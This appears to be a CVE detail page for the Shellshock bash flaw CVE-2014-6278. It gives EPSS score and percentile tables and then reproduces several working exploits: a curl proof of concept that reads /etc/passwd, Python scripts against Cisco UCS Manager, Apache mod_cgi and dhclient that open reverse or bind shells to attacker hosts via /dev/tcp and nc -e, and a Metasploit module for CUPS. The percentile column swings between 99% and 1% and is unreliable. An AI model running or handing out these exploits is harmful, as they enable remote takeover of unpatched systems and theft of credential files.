CVE-2014-6278 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	62.39%	–	–
2023-03-12	–	–	–	97.4%	–
2023-07-23	–	–	–	97.36%	–
2023-10-29	–	–	–	97.35%	–
2024-06-02	–	–	–	97.35%	–
2024-06-30	–	–	–	97.3%	–
2024-09-29	–	–	–	97.35%	–
2025-01-19	–	–	–	97.35%	–
2025-03-18	–	–	–	–	89.22%
2025-04-15	–	–	–	–	89.22%
2025-05-01	–	–	–	–	89.22%
2025-05-04	–	–	–	–	89.22%
2025-05-25	–	–	–	–	89.22%
2025-09-16	–	–	–	–	86.19%
2025-10-02	–	–	–	–	86.72%
2025-10-03	–	–	–	–	91.61%
2025-10-10	–	–	–	–	90.92%
2025-10-17	–	–	–	–	90.89%
2025-10-24	–	–	–	–	90.48%
2025-11-01	–	–	–	–	89.93%
2025-11-01	–	–	–	–	89.93,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	99%
2023-03-12	1%
2023-07-23	1%
2023-10-29	1%
2024-06-02	1%
2024-06-30	1%
2024-09-29	1%
2025-01-19	1%
2025-03-18	1%
2025-04-15	99%
2025-05-01	1%
2025-05-04	99%
2025-05-25	1%
2025-09-16	99%
2025-10-02	99%
2025-10-03	1%
2025-10-10	1%
2025-10-17	1%
2025-10-24	1%
2025-11-01	1%
2025-11-01	1%

# Exploit Title: ShellShock On Sun Secure Global Desktop & Oracle Global desktop # Google Dork: intitle:Install the Sun Secure Global Desktop Native Client # Date: 6/4/2016 # Exploit Author: lastc0de@outlook.com # Vendor Homepage: http://www.sun.com/ & http://www.oracle.com/ # Software Link: http://www.oracle.com/technetwork/server-storage/securedesktop/downloads/index.html # Version: 4.61.915 # Tested on: Linux VULNERABLE FILE http://target.com//tarantella/cgi-bin/modules.cgi POC : localhost@~#curl -A "() { :; }; echo; /bin/cat /etc/passwd" http://target.com/tarantella/cgi-bin/modules.cgi > xixixi.txt localhost@~#cat xixixi.txt which will print out the content of /etc/passwd file.

#!/usr/bin/python ############################################### # Cisco UCS Manager 2.1(1b) Shellshock Exploit # # CVE-2014-6278 # Confirmed on version 2.1(1b), but more are likely vulnerable. # Cisco's advisory: # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash # Exploit generates a reverse shell to a nc listener. # Exploit Author: @thatchriseckert ############################################### import sys import requests import time if len(sys.argv) < 4: print "\n[*] Cisco UCS Manager 2.1(1b) Shellshock Exploit" print "[*] Usage: <Victim IP> <Attacking Host> <Reverse Shell Port>" print "[*]" print "[*] Example: shellshock.py 127.0.0.1 127.0.0.1 4444" print "[*] Listener: nc -lvp <port>" print "\n" sys.exit() #Disables request warning for cert validation ignore. requests.packages.urllib3.disable_warnings() ucs = sys.argv[1] url = "https://" + ucs + "/ucsm/isSamInstalled.cgi" attackhost = sys.argv[2] revshellport = sys.argv[3] headers1 = { 'User-Agent': '() { ignored;};/bin/bash -i >& /dev/tcp/' + attackhost + '/' + revshellport + ' 0>&1' } headers2 = { "User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; echo $(</etc/passwd)' } def exploit(): try: r = requests.get(url, headers=headers1, verify=False, timeout=5) except Exception, e: if 'timeout' in str(e): print "[+] Success. Enjoy your shell..." else: print "[-] Something is wrong..." print "[-] Error: " + str(e) def main(): try: r = requests.get(url, headers=headers2, verify=False, timeout=3) if r.content.startswith('\nroot:'): print "[+] Host is vulnerable, spawning shell..." time.sleep(3) exploit() else: print "[-] Host is not vulnerable, quitting..." sys.exit() except Exception, e: print "[-] Something is wrong..." print "[-] Error: " + str(e) if __name__ == "__main__": main()

#!/usr/bin/env python from socket import * from threading import Thread import thread, time, httplib, urllib, sys stop = False proxyhost = "" proxyport = 0 def usage(): print """ Shellshock apache mod_cgi remote exploit Usage: ./exploit.py var=<value> Vars: rhost: victim host rport: victim port for TCP shell binding lhost: attacker host for TCP shell reversing lport: attacker port for TCP shell reversing pages: specific cgi vulnerable pages (separated by comma) proxy: host:port proxy Payloads: "reverse" (unix unversal) TCP reverse shell (Requires: rhost, lhost, lport) "bind" (uses non-bsd netcat) TCP bind shell (Requires: rhost, rport) Example: ./exploit.py payload=reverse rhost=1.2.3.4 lhost=5.6.7.8 lport=1234 ./exploit.py payload=bind rhost=1.2.3.4 rport=1234 Credits: Federico Galatolo 2014 """ sys.exit(0) def exploit(lhost,lport,rhost,rport,payload,pages): headers = {"Cookie": payload, "Referer": payload} for page in pages: if stop: return print "[-] Trying exploit on : "+page if proxyhost != "": c = httplib.HTTPConnection(proxyhost,proxyport) c.request("GET","http://"+rhost+page,headers=headers) res = c.getresponse() else: c = httplib.HTTPConnection(rhost) c.request("GET",page,headers=headers) res = c.getresponse() if res.status == 404: print "[*] 404 on : "+page time.sleep(1) args = {} for arg in sys.argv[1:]: ar = arg.split("=") args[ar[0]] = ar[1] try: args['payload'] except: usage() if args['payload'] == 'reverse': try: lhost = args['lhost'] lport = int(args['lport']) rhost = args['rhost'] payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+str(lport)+" 0>&1 &" except: usage() elif args['payload'] == 'bind': try: rhost = args['rhost'] rport = args['rport'] payload = "() { :;}; /bin/bash -c 'nc -l -p "+rport+" -e /bin/bash &'" except: usage() else: print "[*] Unsupported payload" usage() try: pages = args['pages'].split(",") except: pages = ["/cgi-sys/entropysearch.cgi","/cgi-sys/defaultwebpage.cgi","/cgi-mod/index.cgi","/cgi-bin/test.cgi","/cgi-bin-sdb/printenv"] try: proxyhost,proxyport = args['proxy'].split(":") except: pass if args['payload'] == 'reverse': serversocket = socket(AF_INET, SOCK_STREAM) buff = 1024 addr = (lhost, lport) serversocket.bind(addr) serversocket.listen(10) print "[!] Started reverse shell handler" thread.start_new_thread(exploit,(lhost,lport,rhost,0,payload,pages,)) if args['payload'] == 'bind': serversocket = socket(AF_INET, SOCK_STREAM) addr = (rhost,int(rport)) thread.start_new_thread(exploit,("",0,rhost,rport,payload,pages,)) buff = 1024 while True: if args['payload'] == 'reverse': clientsocket, clientaddr = serversocket.accept() print "[!] Successfully exploited" print "[!] Incoming connection from "+clientaddr[0] stop = True clientsocket.settimeout(3) while True: reply = raw_input(clientaddr[0]+"> ") clientsocket.sendall(reply+"\n") try: data = clientsocket.recv(buff) print data except: pass if args['payload'] == 'bind': try: serversocket = socket(AF_INET, SOCK_STREAM) time.sleep(1) serversocket.connect(addr) print "[!] Successfully exploited" print "[!] Connected to "+rhost stop = True serversocket.settimeout(3) while True: reply = raw_input(rhost+"> ") serversocket.sendall(reply+"\n") data = serversocket.recv(buff) print data except: pass

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'CUPS Filter Bash Environment Variable Code Injection', 'Description' => %q{ This module exploits a post-auth code injection in specially crafted environment variables in Bash, specifically targeting CUPS filters through the PRINTER_INFO and PRINTER_LOCATION variables by default. }, 'Author' => [ 'Stephane Chazelas', # Vulnerability discovery 'lcamtuf', # CVE-2014-6278 'Brendan Coles <bcoles[at]gmail.com>' # msf ], 'References' => [ ['CVE', '2014-6271'], ['CVE', '2014-6278'], ['EDB', '34765'], ['URL', 'https://access.redhat.com/articles/1200223'], ['URL', 'http://seclists.org/oss-sec/2014/q3/649'] ], 'Privileged' => false, 'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00\x0A\x0D", 'DisableNops' => true }, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic bash awk ruby' }, # Tested: # - CUPS version 1.4.3 on Ubuntu 10.04 (x86) # - CUPS version 1.5.3 on Debian 7 (x64) # - CUPS version 1.6.2 on Fedora 19 (x64) # - CUPS version 1.7.2 on Ubuntu 14.04 (x64) 'Targets' => [[ 'Automatic Targeting', { 'auto' => true } ]], 'DefaultTarget' => 0, 'DisclosureDate' => 'Sep 24 2014', 'License' => MSF_LICENSE )) register_options([ Opt::RPORT(631), OptBool.new('SSL', [ true, 'Use SSL', true ]), OptString.new('USERNAME', [ true, 'CUPS username', 'root']), OptString.new('PASSWORD', [ true, 'CUPS user password', '']), OptEnum.new('CVE', [ true, 'CVE to exploit', 'CVE-2014-6271', ['CVE-2014-6271', 'CVE-2014-6278'] ]), OptString.new('RPATH', [ true, 'Target PATH for binaries', '/bin' ]) ], self.class) end # # CVE-2014-6271 # def cve_2014_6271(cmd) %{() { :;}; $(#{cmd}) & } end # # CVE-2014-6278 # def cve_2014_6278(cmd) %{() { _; } >_[$($())] { echo -e "\r\n$(#{cmd})\r\n" ; }} end # # Check credentials # def check @cookie = rand_text_alphanumeric(16) printer_name = rand_text_alphanumeric(10 + rand(5)) res = add_printer(printer_name, '') if !res vprint_error("#{peer} - No response from host") return Exploit::CheckCode::Unknown elsif res.headers['Server'] =~ /CUPS\/([\d\.]+)/ vprint_status("#{peer} - Found CUPS version #{$1}") else print_status("#{peer} - Target is not a CUPS web server") return Exploit::CheckCode::Safe end if res.body =~ /Set Default Options for #{printer_name}/ vprint_good("#{peer} - Added printer successfully") delete_printer(printer_name) elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) vprint_error("#{peer} - Authentication failed") elsif res.code == 426 vprint_error("#{peer} - SSL required - set SSL true") end Exploit::CheckCode::Detected end # # Exploit # def exploit @cookie = rand_text_alphanumeric(16) printer_name = rand_text_alphanumeric(10 + rand(5)) # Select target CVE case datastore['CVE'] when 'CVE-2014-6278' cmd = cve_2014_6278(payload.raw) else cmd = cve_2014_6271(payload.raw) end # Add a printer containing the payload # with a CUPS filter pointing to /bin/bash res = add_printer(printer_name, cmd) if !res fail_with(Failure::Unreachable, "#{peer} - Could not add printer - Connection failed.") elsif res.body =~ /Set Default Options for #{printer_name}/ print_good("#{peer} - Added printer successfully") elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) fail_with(Failure::NoAccess, "#{peer} - Could not add printer - Authentication failed.") elsif res.code == 426 fail_with(Failure::BadConfig, "#{peer} - Could not add printer - SSL required - set SSL true.") else fail_with(Failure::Unknown, "#{peer} - Could not add printer.") end # Add a test page to the print queue. # The print job triggers execution of the bash filter # which executes the payload in the environment variables. res = print_test_page(printer_name) if !res fail_with(Failure::Unreachable, "#{peer} - Could not add test page to print queue - Connection failed.") elsif res.body =~ /Test page sent; job ID is/ vprint_good("#{peer} - Added test page to printer queue") elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) fail_with(Failure::NoAccess, "#{peer} - Could not add test page to print queue - Authentication failed.") elsif res.code == 426 fail_with(Failure::BadConfig, "#{peer} - Could not add test page to print queue - SSL required - set SSL true.") else fail_with(Failure::Unknown, "#{peer} - Could not add test page to print queue.") end # Delete the printer res = delete_printer(printer_name) if !res fail_with(Failure::Unreachable, "#{peer} - Could not delete printer - Connection failed.") elsif res.body =~ /has been deleted successfully/ print_status("#{peer} - Deleted printer '#{printer_name}' successfully") elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) vprint_warning("#{peer} - Could not delete printer '#{printer_name}' - Authentication failed.") elsif res.code == 426 vprint_warning("#{peer} - Could not delete printer '#{printer_name}' - SSL required - set SSL true.") else vprint_warning("#{peer} - Could not delete printer '#{printer_name}'") end end # # Add a printer to CUPS # def add_printer(printer_name, cmd) vprint_status("#{peer} - Adding new printer '#{printer_name}'") ppd_name = "#{rand_text_alphanumeric(10 + rand(5))}.ppd" ppd_file = <<-EOF *PPD-Adobe: "4.3" *%==== General Information Keywords ======================== *FormatVersion: "4.3" *FileVersion: "1.00" *LanguageVersion: English *LanguageEncoding: ISOLatin1 *PCFileName: "#{ppd_name}" *Manufacturer: "Brother" *Product: "(Brother MFC-3820CN)" *1284DeviceID: "MFG:Brother;MDL:MFC-3820CN" *cupsVersion: 1.1 *cupsManualCopies: False *cupsFilter: "application/vnd.cups-postscript 0 #{datastore['RPATH']}/bash" *cupsModelNumber: #{rand(10) + 1} *ModelName: "Brother MFC-3820CN" *ShortNickName: "Brother MFC-3820CN" *NickName: "Brother MFC-3820CN CUPS v1.1" *% *%==== Basic Device Capabilities ============= *LanguageLevel: "3" *ColorDevice: True *DefaultColorSpace: RGB *FileSystem: False *Throughput: "12" *LandscapeOrientation: Plus90 *VariablePaperSize: False *TTRasterizer: Type42 *FreeVM: "1700000" *DefaultOutputOrder: Reverse *%==== Media Selection ====================== *OpenUI *PageSize/Media Size: PickOne *OrderDependency: 18 AnySetup *PageSize *DefaultPageSize: BrLetter *PageSize BrA4/A4: "<</PageSize[595 842]/ImagingBBox null>>setpagedevice" *PageSize BrLetter/Letter: "<</PageSize[612 792]/ImagingBBox null>>setpagedevice" EOF pd = Rex::MIME::Message.new pd.add_part(ppd_file, 'application/octet-stream', nil, %(form-data; name="PPD_FILE"; filename="#{ppd_name}")) pd.add_part("#{@cookie}", nil, nil, %(form-data; name="org.cups.sid")) pd.add_part("add-printer", nil, nil, %(form-data; name="OP")) pd.add_part("#{printer_name}", nil, nil, %(form-data; name="PRINTER_NAME")) pd.add_part("", nil, nil, %(form-data; name="PRINTER_INFO")) # injectable pd.add_part("#{cmd}", nil, nil, %(form-data; name="PRINTER_LOCATION")) # injectable pd.add_part("file:///dev/null", nil, nil, %(form-data; name="DEVICE_URI")) data = pd.to_s data.strip! send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'admin'), 'ctype' => "multipart/form-data; boundary=#{pd.bound}", 'data' => data, 'cookie' => "org.cups.sid=#{@cookie};", 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) ) end # # Queue a printer test page # def print_test_page(printer_name) vprint_status("#{peer} - Adding test page to printer queue") send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'printers', printer_name), 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'cookie' => "org.cups.sid=#{@cookie}", 'vars_post' => { 'org.cups.sid' => @cookie, 'OP' => 'print-test-page' } ) end # # Delete a printer # def delete_printer(printer_name) vprint_status("#{peer} - Deleting printer '#{printer_name}'") send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'admin'), 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'cookie' => "org.cups.sid=#{@cookie}", 'vars_post' => { 'org.cups.sid' => @cookie, 'OP' => 'delete-printer', 'printer_name' => printer_name, 'confirm' => 'Delete Printer' } ) end end

#!/usr/bin/python # Exploit Title: ShellShock dhclient Bash Environment Variable Command Injection PoC # Date: 2014-09-29 # Author: @fdiskyou # e-mail: rui at deniable.org # Version: 4.1 # Tested on: Debian, Ubuntu, Kali # CVE: CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187 from scapy.all import * conf.checkIPaddr = False fam,hw = get_if_raw_hwaddr(conf.iface) victim_assign_ip = "10.0.1.100" server_ip = "10.0.1.2" gateway_ip = "10.0.1.2" subnet_mask = "255.255.255.0" dns_ip = "8.8.8.8" spoofed_mac = "00:50:56:c0:00:01" payload = "() { ignored;}; echo 'moo'" payload_2 = "() { ignored;}; /bin/nc -e /bin/bash localhost 7777" payload_3 = "() { ignored;}; /bin/bash -i >& /dev/tcp/10.0.1.1/4444 0>&1 &" payload_4 = "() { ignored;}; /bin/cat /etc/passwd" payload_5 = "() { ignored;}; /usr/bin/wget http://google.com" rce = payload_5 def toMAC(strMac): cmList = strMac.split(":") hCMList = [] for iter1 in cmList: hCMList.append(int(iter1, 16)) hMAC = struct.pack('!B', hCMList[0]) + struct.pack('!B', hCMList[1]) + struct.pack('!B', hCMList[2]) + struct.pack('!B', hCMList[3]) + struct.pack('!B', hCMList[4]) + struct.pack('!B', hCMList[5]) return hMAC def detect_dhcp(pkt): # print 'Process ', ls(pkt) if DHCP in pkt: # if DHCP Discover then DHCP Offer if pkt[DHCP].options[0][1]==1: clientMAC = pkt[Ether].src print "DHCP Discover packet detected from " + clientMAC sendp( Ether(src=spoofed_mac,dst="ff:ff:ff:ff:ff:ff")/ IP(src=server_ip,dst="255.255.255.255")/ UDP(sport=67,dport=68)/ BOOTP( op=2, yiaddr=victim_assign_ip, siaddr=server_ip, giaddr=gateway_ip, chaddr=toMAC(clientMAC), xid=pkt[BOOTP].xid, sname=server_ip )/ DHCP(options=[('message-type','offer')])/ DHCP(options=[('subnet_mask',subnet_mask)])/ DHCP(options=[('name_server',dns_ip)])/ DHCP(options=[('lease_time',43200)])/ DHCP(options=[('router',gateway_ip)])/ DHCP(options=[('dump_path',rce)])/ DHCP(options=[('server_id',server_ip),('end')]), iface="vmnet1" ) print "DHCP Offer packet sent" # if DHCP Request than DHCP ACK if pkt[DHCP] and pkt[DHCP].options[0][1] == 3: clientMAC = pkt[Ether].src print "DHCP Request packet detected from " + clientMAC sendp( Ether(src=spoofed_mac,dst="ff:ff:ff:ff:ff:ff")/ IP(src=server_ip,dst="255.255.255.255")/ UDP(sport=67,dport=68)/ BOOTP( op=2, yiaddr=victim_assign_ip, siaddr=server_ip, giaddr=gateway_ip, chaddr=toMAC(clientMAC), xid=pkt[BOOTP].xid )/ DHCP(options=[('message-type','ack')])/ DHCP(options=[('subnet_mask',subnet_mask)])/ DHCP(options=[('lease_time',43200)])/ DHCP(options=[('router',gateway_ip)])/ DHCP(options=[('name_server',dns_ip)])/ DHCP(options=[('dump_path',rce)])/ DHCP(options=[('server_id',server_ip),('end')]), iface="vmnet1" ) print "DHCP Ack packet sent" def main(): #sniff DHCP requests sniff(filter="udp and (port 67 or 68)", prn=detect_dhcp, iface="vmnet1") if __name__ == '__main__': sys.exit(main())

#!/usr/bin/python # Exploit Title: dhclient shellshocker # Google Dork: n/a # Date: 10/1/14 # Exploit Author: @0x00string # Vendor Homepage: gnu.org # Software Link: http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz # Version: 4.3.11 # Tested on: Ubuntu 14.04.1 # CVE : CVE-2014-6277,CVE-2014-6278,CVE-2014-7169,CVE-2014-7186,CVE-2014-7187 # ______ ______ ______ _ # / __ | / __ |/ __ | _ (_) #| | //| |_ _| | //| | | //| | ___| |_ ____ _ ____ ____ ___ #| |// | ( \ / ) |// | | |// | |/___) _) / ___) | _ \ / _ |/___) #| /__| |) X (| /__| | /__| |___ | |__| | | | | | ( ( | |___ | # \_____/(_/ \_)\_____/ \_____/(___/ \___)_| |_|_| |_|\_|| (___/ # (_____| # _ _ _ _ # | | | | (_) _ # _ | | | _ ____| |_ ____ ____ | |_ # / || | || \ / ___) | |/ _ ) _ \| _) #( (_| | | | ( (___| | ( (/ /| | | | |__ # \____|_| |_|\____)_|_|\____)_| |_|\___) # # _ _ _ _ _ # | | | | | | | | | # ___| | _ ____| | | ___| | _ ___ ____| | _ ____ ____ # /___) || \ / _ ) | |/___) || \ / _ \ / ___) | / ) _ )/ ___) #|___ | | | ( (/ /| | |___ | | | | |_| ( (___| |< ( (/ /| | #(___/|_| |_|\____)_|_(___/|_| |_|\___/ \____)_| \_)____)_| # this buddy listens for clients performing a DISCOVER, a later version will exploit periodic REQUESTs, which can sometimes be prompted by causing IP conflicts # once a broadcast DISCOVER packet has been detected, the XID, MAC and requested IP are pulled from the pack and a corresponding OFFER and ACK are generated and pushed out # The client is expected to reject the offer in preference of their known DHCP server, but will still process the packet, triggering the vulnerability. # can use option 114, 56 or 61, though is hardcoded to use 114 as this is merely a quick and dirty example. import socket, struct def HexToByte( hexStr ): b = [] h = ''.join( h.split(" ") ) for i in range(0, len(h), 2): b.append( chr( int (h[i:i+2], 16 ) ) ) return ''.join( b ) rport = 68 lport = 67 bsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) bsock.bind(("<broadcast>", lport)) while True: OP = "72" # 56, Message - RFC 1533,2132. 61, Client-identifier - RFC 1533,2132,4361 or 114, URL - RFC 3679 are currently known to work, here we use 114 URL = "() { :;}; bash -i >& /dev/tcp/10.0.0.1/1337 0>&1".encode("hex") URLLEN = chr(len(URL) / 2).encode("hex") END = "03040a000001ff" broadcast_get, (bcrhost, rport) = bsock.recvfrom(2048) hexip = broadcast_get[245:249] rhost = str(ord(hexip[0])) + "." + str(ord(hexip[1])) + "." + str(ord(hexip[2])) + "." + str(ord(hexip[3])) XID = broadcast_get[4:8].encode("hex") chaddr = broadcast_get[29:34].encode("hex") print "[+]\tgot broadcast with XID " + XID + " requesting IP " + rhost + "\n" OFFER = "02010600" + XID + "00000000000000000a0000430a0000010000000000" + chaddr + "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006382536335010236040a000001330400000e103a04000007083b0400000c4e0104ffffff001c040a0000ff06040a0000010f034c4f4c0c076578616d706c65" + OP + URLLEN + URL + END OFFER_BYTES = HexToByte(OFFER) ACK = "02010600" + XID + "00000000000000000a0000430a0000010000000000" + chaddr + "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006382536335010536040a000001330400000e103a04000007083b0400000c4e0104ffffff001c040a0000ff06040a0000010f034c4f4c0c076578616d706c65" + OP + URLLEN + URL + END ACK_BYTES = HexToByte(ACK) print "[+]\tsending evil offer\n" sock.sendto(OFFER_BYTES, (rhost, rport)) broadcast_get2 = bsock.recvfrom(2048) print "[+]\tassuming request was received, sending ACK\n" sock.sendto(ACK_BYTES, (rhost, rport))